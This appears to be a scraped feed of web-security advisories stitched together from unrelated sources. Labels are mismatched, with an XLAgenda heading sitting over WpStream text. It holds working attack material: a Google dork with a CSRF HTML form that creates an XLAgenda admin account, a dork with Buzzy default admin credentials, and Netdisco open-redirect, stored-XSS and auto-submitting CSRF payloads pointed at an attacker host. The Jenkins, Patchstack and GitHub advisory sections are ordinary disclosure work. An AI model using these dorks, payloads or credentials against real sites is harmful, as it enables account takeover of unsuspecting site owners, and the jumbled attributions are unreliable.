XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  | # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin.[+] Go to the line 12.[+] Set the target site link Save changes and apply. [+] infected file : /install/install2.php.[+] http://127.0.0.1/xlagenda44/install/install2.php[+] save code as poc.html .<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>XLAgenda 4.4 | Installation</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><link href="style.css" rel="stylesheet" type="text/css" /></head><body><h1>Installation - Etape 2/3</h1><p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p><form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">  <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>  <p>    <label for="user">Nom d'utilisateur :</label><br>    <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>    (20 caractères maximum)  </p>  <p>    <label for="pass">Mot de passe :</label><br>    <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>    (6 à 15 caractères)  </p>  <p>    <label for="pass2">Introduisez à nouveau le mot de passe :</label><br>    <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *  </p>  <p>    <label for="nom">Nom :</label><br>    <input name="nom" type="text" id="nom" value="" size="30" />  </p>  <p>    <label for="prenom">Prénom :</label><br>     <input name="prenom" type="text" id="prenom" value="" size="30" />  </p>  <p>    <label for="email">Adresse email :</label><br>    <input name="email" type="text" id="email" value="" size="30" /> *  </p>  <p>    Les champs marqués d'un * sont obligatoires.<br>    Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.  </p>  <p style="text-align:center;">   <input type="submit" name="Submit" value="Continuer >>" />  </p></form></body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

XLAgenda 4.4 Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) vulnerability in Wpstream WpStream – Live Streaming, Video on Demand, Pay Per View plugin <= 4.5.4 versions.

**Solution**

 Fixed

Update the WordPress WpStream – Live Streaming, Video on Demand, Pay Per View plugin to the latest available version (at least 4.5.5).

Found this useful? Thank Elliot for reporting this vulnerability. Buy a coffee ☕

Elliot discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WpStream – Live Streaming, Video on Demand, Pay Per View Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 4.5.5.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38512: WordPress WpStream – Live Streaming, Video on Demand, Pay Per View  plugin <= 4.5.4 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

Netdisco before v2.063000 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Netdisco-CVE-2023-37624****Description**

Netdisco before version 2.063000 was found to contain an open redirect vulnerability due to insufficient validation of an input parameter. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking them into clicking on a specially crafted link.

**Technical Details**

If a user attempts to access a page within Netdisco without a valid session, they are redirected to the login page. Once logged in, the user will be redirected to the page they originally attempted to visit. Insufficient validation of the original url allows a malicious actor to specify an arbitrary URL in the original GET request to the login page.

To reproduce the vulnerability the following URL may be provided:

    http://netdiscoexample.host///www.google.com
    

This will redirect the user to Google after the login process is complete.

**Netdisco-CVE-2023-37623****Description**

Netdisco before version 2.063000 was found to contain multiple stored cross-site scripting (XSS) vulnerabilities. An attacker may exploit this to perform unauthorised actions on behalf of a user.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the main search box of the web applicaiton. This vulnerability is the result of insufficient sanitisation of the System Name device field. When a search for a device is performed by typing in an IP address, once at least three characters are entered in the search bar matching device System Names are presented in a drop down list by the typeahead feature. If the System Name contains HTML tags, the browser will interpret the contents as valid HTML.

To reproduce the vulnerability, perform the following steps:

1.  Log in to Netdisco as an administrator.
2.  Go to the admin dropdown menu and select Pseudo Devices.
3.  Enter any IPV4 address as the Device IP (eg. 192.168.0.1), then enter the Device Name below, and click the Add button.

    <script>alert(1)</script>
    

4.  Then in the main search box containing the text "Find Anything", enter the first three numbers of the Device IP (i.e. 192).
5.  Observe that the alert box has executed.

Note: There are other ways to inject a payload into the System Name without creating a pseudo device and requiring an admin login.

For example an attacker may set up SNMP on their machine and inserts a Java Script payload as the Device Name, as in the configuration file below:

To inject the payload into Netdisco it is possible to submit a discovery request for the attacker controlled IP. This can be done by enticing an administrator with a valid session can be enticed into clicking on a link that utilises the Open Redirect vulnerability from CVE 2023-37624, for example; 'https://netdiscoexample.host///attacker.host/csrf.html', where netdiscoexample.host is the Netdisco URL and attacker.host/csrf.html hosts the following HTML:

<body onload\="document.form.submit()"\>
   <form action\="https://netdiscoexample.host/admin/discover?device=attackerIP" method\="POST" name\="form" style\="display;none;"\>
</form\>
</body\>

If the administrator clicks on this link then attacker's machine will be discovered and the payload loaded through SNMP and executed when the IP is entered in the search bar, as in the screenshot below.

An additional stored Cross-Site Scripting vulnerability was found in the Job Queue page. This vulnerability is the result of insufficient sanitisation of the Param job field.

To reproduce the vulnerability, perform the following steps:

1.  Log into Netdisco as an administrator.
2.  Go to the Inventory page and open any device. If a device is not present, then add a Pseudo Device as above.
3.  Click in the contact field and enter the following text:

    <script>alert(1)</script>
    

4.  Go to the Admin dropdown menu and select Job Queue.
5.  Esnure the job has a Status of "Done", then hover the mouse point over the Param field containing the text "<script>alert(1)</script>".
6.  Observe that the alert box has executed.

CVE-2023-37624: GitHub - benjaminpsinclair/Netdisco-2023-Advisory

A cross-site request forgery (CSRF) vulnerability in Jenkins Bazaar Plugin 1.22 and earlier allows attackers to delete previously created Bazaar SCM tags.

**CSRF vulnerability in Bazaar Plugin**

Moderate severity GitHub Reviewed Published Jul 26, 2023 to the GitHub Advisory Database • Updated Jul 26, 2023

GHSA-6f4q-f5fj-q6fc: CSRF vulnerability in Bazaar Plugin 

GitLab Authentication Plugin 1.17.1 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request.

This vulnerability allows attackers to trick users into logging in to the attacker’s account.

GitLab Authentication Plugin 1.18 implements a state parameter in its OAuth flow.


**CSRF vulnerability in GitLab Authentication Plugin**

Moderate severity GitHub Reviewed Published Jul 26, 2023 to the GitHub Advisory Database • Updated Jul 26, 2023

GHSA-cg6r-gqvc-r396: CSRF vulnerability in GitLab Authentication Plugin

A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Authentication Plugin 1.17.1 and earlier allows attackers to trick users into logging in to the attacker's account.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Bazaar Plugin
*   Chef Identity Plugin
*   GitLab Authentication Plugin
*   Gradle Plugin
*   Qualys Web App Scanning Connector Plugin
*   ServiceNow DevOps Plugin

**Descriptions****Stored XSS vulnerability**

**SECURITY-3188 / CVE-2023-39151**  
**Severity (CVSS):** High  
**Description:**

Jenkins applies formatting to the console output of builds, transforming plain URLs into hyperlinks.

Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs of these hyperlinks in build logs.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.

Jenkins 2.416, LTS 2.401.3 encodes URLs of affected hyperlink annotations in build logs.

**Incorrect control flow in Gradle Plugin breaks credentials masking in the build log**

**SECURITY-3208 / CVE-2023-39152**  
**Severity (CVSS):** Medium  
**Affected plugin: gradle**  
**Description:**

Gradle Plugin 2.8 improperly invokes APIs available only on the controller from an agent when setting up build log annotations, causing an exception.

As a result, credentials may not be masked (i.e., replaced with asterisks) in the build log in some circumstances.

Gradle Plugin 2.8.1 improves the control flow and handles the exception, so that credentials masking is not affected.

An improvement in Pipeline: API 1232.v1679fa\_2f0f76 prevents issues like this from affecting credentials masking in the future. As of the publication of this advisory, the Jenkins security team is not aware of other plugins with a similar issue.

**CSRF vulnerability in GitLab Authentication Plugin**

**SECURITY-2696 / CVE-2023-39153**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin 1.17.1 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request.

This vulnerability allows attackers to trick users into logging in to the attacker’s account.

GitLab Authentication Plugin 1.18 implements a state parameter in its OAuth flow.

**CSRF vulnerability and missing permission check in ServiceNow DevOps Plugin allow capturing credentials**

**SECURITY-3129 / CVE-2023-3414 (CSRF), CVE-2023-3442 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: servicenow-devops**  
**Description:**

ServiceNow DevOps Plugin 1.38.0 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

ServiceNow DevOps Plugin 1.38.1 requires POST requests and Overall/Administer permission for the affected form validation method.

**Incorrect permission checks in Qualys Web App Scanning Connector Plugin allow capturing credentials**

**SECURITY-3012 / CVE-2023-39154**  
**Severity (CVSS):** Medium  
**Affected plugin: qualys-was**  
**Description:**

Qualys Web App Scanning Connector Plugin 2.0.10 and earlier does not correctly perform permission checks in several HTTP endpoints.

This allows attackers with global Item/Configure permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Qualys Web App Scanning Connector Plugin 2.0.11 requires the appropriate permissions for the affected HTTP endpoints.

**Secret displayed without masking by Chef Identity Plugin**

**SECURITY-3192 / CVE-2023-39155**  
**Severity (CVSS):** Low  
**Affected plugin: chef-identity**  
**Description:**

Chef Identity Plugin stores the user.pem key in its global configuration file io.chef.jenkins.ChefIdentityBuildWrapper.xml on the Jenkins controller as part of its configuration.

While this key is stored encrypted on disk, in Chef Identity Plugin 2.0.3 and earlier the global configuration form does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.

**CSRF vulnerability in Bazaar Plugin**

**SECURITY-3095 / CVE-2023-39156**  
**Severity (CVSS):** Medium  
**Affected plugin: bazaar**  
**Description:**

Bazaar Plugin 1.22 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to delete previously created Bazaar SCM tags.

**Severity**

*   SECURITY-2696: Medium
*   SECURITY-3012: Medium
*   SECURITY-3095: Medium
*   SECURITY-3129: Medium
*   SECURITY-3188: High
*   SECURITY-3192: Low
*   SECURITY-3208: Medium

**Affected Versions**

*   **Jenkins weekly** up to and including 2.415
*   **Jenkins LTS** up to and including 2.401.2
*   **Bazaar Plugin** up to and including 1.22
*   **Chef Identity Plugin** up to and including 2.0.3
*   **GitLab Authentication Plugin** up to and including 1.17.1
*   **Gradle Plugin** up to and including 2.8
*   **Qualys Web App Scanning Connector Plugin** up to and including 2.0.10
*   **ServiceNow DevOps Plugin** up to and including 1.38.0

**Fix**

*   **Jenkins weekly** should be updated to version 2.416
*   **Jenkins LTS** should be updated to version 2.401.3
*   **GitLab Authentication Plugin** should be updated to version 1.18
*   **Gradle Plugin** should be updated to version 2.8.1
*   **Qualys Web App Scanning Connector Plugin** should be updated to version 2.0.11
*   **ServiceNow DevOps Plugin** should be updated to version 1.38.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Bazaar Plugin
*   Chef Identity Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3129
*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3192
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3095
*   **Kevin Guerroudj, CloudBees, Inc. and Devin Nusbaum, CloudBees, Inc.** for SECURITY-3188
*   **Wadeck Follonier, CloudBees Inc.** for SECURITY-2696
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3012

CVE-2023-39153: Jenkins Security Advisory 2023-07-26

Jenkins Chef Identity Plugin 2.0.3 and earlier does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.

CVE-2023-39155: Jenkins Security Advisory 2023-07-26

Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs in build logs when transforming them into hyperlinks, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.

CVE-2023-39151: Jenkins Security Advisory 2023-07-26

Incorrect permission checks in Jenkins Qualys Web App Scanning Connector Plugin 2.0.10 and earlier allow attackers with global Item/Configure permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Tag

#csrf